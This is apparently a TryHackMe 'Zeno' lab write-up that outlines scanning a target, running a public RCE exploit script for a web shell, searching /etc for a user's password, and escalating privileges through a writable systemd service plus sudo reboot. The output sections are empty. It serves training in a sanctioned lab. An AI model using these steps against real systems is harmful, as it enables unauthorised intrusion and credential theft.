TryHackMe Zeno Writeup / Linux-Lab / OSCP

Step 1: Port overview

Command:

nmap -vv -p- -T5 -Pn 10.10.228.41 -oN open_ports

Get:

Command:

sudo nmap -O -sV -sC -p 22,12340 10.10.228.41 -oN nmap_scan

Get:

Step 2: Check port 12340

Enum http://10.10.228.41:12340

Command:

gobuster dir -u http://10.10.228.41:12340 -w '/wordlists/dirb/big.txt' -x txt,php,html -t 80

Get:

Step 3: Exploit

Google “Pathfinder Hotel exploit”

Get:

Code without syntax errors:

Command:

python2 rms-rce.py http://10.10.228.41:12340/rms/

Get:

Trigger WebShell:

Get Shell:

Step 4 Enum server

Command:

find / -user edward 2>/dev/null

Get:

We have “zeno” in “/var/spool/mail”

Search for “zeno”

Command:

grep -r -i zeno /etc 2>/dev/null -A 2 -B 2

Get:

We have the password for Edward

Step 5: PrivEsc

Command:

sudo -l

Get:

“reboot” alone is not helpful, but in combination with a system file it is

Command:

find /etc -writable 2>/dev/null

Get:

Exploit “/etc/systemd/system/zeno-monitoring.service”

Command:

cat /etc/systemd/system/zeno-monitoring.service

Get:

Manipulate “/etc/systemd/system/zeno-monitoring.service”

Command:

sudo /usr/sbin/reboot

Wait 2–3 minutes

Link to Try Hack Me: https://tryhackme.com

Link to challenge: https://tryhackme.com/r/room/zeno